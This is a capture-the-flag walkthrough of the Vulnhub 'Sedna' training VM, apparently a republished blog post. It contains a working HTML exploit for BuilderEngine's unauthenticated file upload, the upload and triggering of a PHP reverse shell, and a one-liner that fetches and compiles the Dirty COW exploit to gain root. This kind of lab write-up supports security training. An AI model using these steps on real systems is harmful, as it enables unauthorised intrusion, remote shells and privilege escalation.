Vulnhub - Sedna
These are my notes from running through the Sedna vulnerable VM.Run discover content in Burp to map 2017-3-27 10:13:16 Author: techvomit.net(查看原文) 阅读量:0 收藏

These are my notes from running through the Sedna vulnerable VM.

Run discover content in Burp to map the application out. You can also run Nikto to try and find any vulnerabilities.

Observe /license.txt - it will inform us that the target web application is running BuilderEngine.

Search for an exploit we can use:

searchsploit builderengine

View the source for the exploit:

Copy the exploit code into exploit.html:

<html>
  <body>
    <form
      method="post"
      action="http://<vulnerable ip>/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
      enctype="multipart/form-data"
    >
      <input type="file" name="files[]" />
      <input type="submit" value="send" />
    </form>
  </body>
</html>

Host it:

python -m SimpleHTTPServer 8000 # make sure exploit.html is in this directory

In a web browser: http://127.0.0.1:8000/exploit.html

Modify the laudanum backdoor to match the IP address and whatever port for our attacker machine. We can get this from here.

Upload laudanum backdoor through exploit.html:

Click Choose File, specify php-reverse-shell.php Click send

Start listener on attacker:

Initiate connection:

http://<vulnerable ip>/files/php-reverse-shell.php

After getting the reverse shell:

python -c 'import pty;pty.spawn("/bin/bash")' # get real shell

To elevate our privileges, we’ll use dirtyc0w. Get it and compile it:

cd /tmp && wget https://www.exploit-db.com/download/40839 && mv 40839 40839.c && gcc -pthread -o dirty 40839.c -lcrypt

Run it:

Access the system:

For stability, run this immediately once you’re in:

echo 0 > /proc/sys/vm/dirty_writeback_centisecs

The flags can be found in:

  • /var/www/flag.txt

  • /root/flag.txt

  • /etc/tomcat7/tomcat-users.xml


文章来源: https://techvomit.net/vulnhub-sedna/
如有侵权请联系:admin#unsafe.sh